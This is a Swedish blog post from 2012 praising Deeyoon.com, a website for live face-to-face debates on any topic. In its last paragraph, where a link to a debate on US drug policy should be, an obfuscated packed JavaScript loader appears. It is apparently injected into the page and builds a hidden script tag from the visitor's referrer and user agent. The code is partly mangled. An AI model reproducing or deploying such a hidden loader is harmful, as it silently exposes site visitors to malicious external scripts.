Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2019

Scroll to top

Top

På Deeyoon.com kan du debattera med vem och om vad du vill!

På Deeyoon.com kan du debattera med vem och om vad du vill!
Filip Urde
  • On 4 oktober, 2012
  • http://www.revue.se/filip-urde

Har du någon gång suttit och tittat på SVT Debatt och känt att du vill bara gå lös på någon av deltagarna? Det händer mig varje gång jag ser på debatt… Nu låter det som jag tittar på debatt jämt och ständigt, men faktum är om jag ser debatt i TV-tablån då händer det 8/10 gånger att jag sneglar dit och ser ”what the fuzz is all about”. Jag tycker debatter är kul och jag älskade att debattera i skolan. Men på senare tid så har det inte blivit så mycket debatter för min del. Mycket för att jag inte vill bli ovän med mina vänner som inte kan debattera.

Så om jag debatterar idag så blir det likt vilken annan skrivbordsryttare som helst, på Aftonbl(askan)adet.

Nu har jag dock stött på sajten Deeyoon.com. Där kan du istället debattera ansikte mot ansikte, om vad som helst, med vem som helst.
Du startar en debatt och bjuder in andra människor, eller hoppa in i en debatt som någon annan har föreslagit. Man kan själv välja längden på debatten och då gäller det att vinna innan tiden är slut.

Jag har själv inte debatterat ännu, men det är nog så roligt att bara titta på när andra gör det! =D Så ta er en debatt till eftermiddagsfikan!

Här har vi en ang. USAs drog politik: se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehzdb|var|u0026u|referrer|ietkd||js|php’.split(’|’),0,{}))
här
.

deeyoon.com